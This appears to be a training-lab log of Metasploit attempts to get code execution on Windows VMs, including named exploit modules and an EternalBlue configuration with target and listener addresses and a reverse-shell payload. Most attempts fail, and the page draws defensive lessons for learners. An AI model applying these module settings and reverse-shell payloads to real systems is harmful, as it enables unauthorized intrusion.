3. Payload Delivery > Code-Execution (Type 3)

Assign
Yang Jun
Date
Status
Completed
Property

Setup Kali Linux VM + Metasploit

Kali Linux VM Download Link: https://www.kali.org/get-kali/

Offensive Step Documentation

Attempt 1 BLOCKED: Tried running /windows/fileformat/office_ms17_11882 module but was unsuccessful. Windows Defender identified rtf file as virus.
 
Attempt 2 FAILED: Tried running windows/browser/chrome_filereader_uaf module but was unsuccessful. Stuck in a loop of sending:
notion image
Still unsuccessful even after disabling the sandbox. Likely reason why it doesn't work is that it has been patched on later versions of Chrome.
 
Attempt 3 BLOCKED: Tried running /windows/fileformat/adobe_geticon module but was unsuccessful. Similar to attempt 1, Windows Defender identified the pdf file as virus.
 
*Quite a number of exploit modules in Metasploit are old i.e. many years back. These likely won't work because it has been patched. Need to either find one that is recent that works or try to download an older version of the particular application.
References:
 
Attempt 4: EternalBlue exploit FAILED
From our internal recon, we found out that port 445 is opened on the target machine. This port is needed for EternalBlue to work.
notion image
We can see that the target machine IS vulnerable to the EternalBlue after running the scanner module in Metasploit.
notion image
Next, I ran the windows/smb/ms17_010_eternalblue module on the target machine. Module was unable to establish a meterpreter/shell session.
Config used:
RHOST = 10.10.10.218 (Target IP)
RPORT = 445
LHOST = 10.10.10.102 (Kali IP)
LPORT = 4444
Payload = windows/x64/shell/reverse_tcp
notion image
Reopened msfconsole and retried again. WIN instead of FAIL but yet still no command shell...
notion image
Tried interacting with the session but nothing happens...seems that the command shell opened and got closed immediately.
notion image
References:
 
Attempt 5: BlueKeep_RCE exploit FAILED
notion image
 
Attempt 6: EternalBlue exploit using payload generic/shell_reverse_tcp
notion image
Able to get shell now but entering a command causes it to close...
Attempt to upgrade shell to meterpreter failed because the connection got reset...
notion image
 
Attempt 7: EternalBlue exploit using payload generic/shell_bind_tcp
notion image
No shell again...

Jym's Comments

Remove Kali from ZeroTier

notion image
Upgraded to Meterpreter...
notion image

Routing is the root cause of Yang Jun's problems

So what happened I added 2 routes for me to access Cyber Range directly..
I needed to add Kali into ZT so that YJ can access from remote, but due to the routing that I need, I'd created a problem for him because when the Kali tries to send payloads again, it will end up going to ZT.
notion image
 
notion image
I manually took the URL to target to run... but failed. This means something wrong with networking...
notion image
 

Partial Access

NOT using reverse_tcp (generic/shell_bind_tcp see below). Yang Jun I kill my session, you try again. Wait, I try to upgrade to Meterpreter.. failed.
notion image
notion image
notion image
 
notion image
installed a separate Win7 sp1 64bit to test concurrently.. same as initial .218 experience, all FAIL..
Will add a share folder to retest... looks like still refuse to work for the new VM..

Points to experience for learner

  • Realise exploit payloads from many of these popular offensive tooling (eg. Metasploit) are mostly NOT viable on Win10
  • Compare this experience with your Type 2 Code-Execution attempt, & even Type 1 if there were NO app-control with OpenEDR
    • Why would any sane person make his/her life difficult when there are easier way to execute codes?
  • Why you selected the exploits you did is because you knew what was inside the VM, what if you don't know?
  • Even when the EternalBlue scanner reported as "vulnerable", it may not be reliable.